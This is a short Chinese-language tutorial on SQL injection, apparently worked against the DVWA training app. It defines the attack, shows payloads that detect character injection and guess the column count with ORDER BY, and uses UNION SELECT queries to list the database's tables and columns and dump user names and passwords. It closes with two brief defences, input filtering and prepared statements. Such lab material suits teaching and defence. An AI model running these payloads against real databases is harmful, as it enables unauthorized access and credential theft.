数据库安全之sql注入

什么是sql注入？

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。

怎么判断存在sql注入？

如下图，输入1返回first name和surname。

输入1' and '1'='2，返回空

输入1' or '1'='1，返回所有的first 和surname字段的值

所以判断存在字符注入

order by猜测当前sql语句有几个字段

1' or 1=1 order by 1#

1' or 1=1 order by 2#

1' or 1=1 order by 3#

可以得出只有first 和surname这两个字段。

或者通过union select 1，2，3 。。。来猜字段

查询当前数据库

1' union select 1,database() #

查询当前数据库有哪些表

1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

可以看到当前dvwa数据库里有guestbook和users两个表

查询表中包含哪些字段

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

可以看到当前表中包含8个字段，user_id,first_name,last_name,user,password,avatar,last_login,failed_login

查询所有的first、last name和password

1′ union select group_concat(first_name,last_name),group_concat(password) from users #

怎样防止sql注入？

1、对用户输入进行过滤

2、采用预编译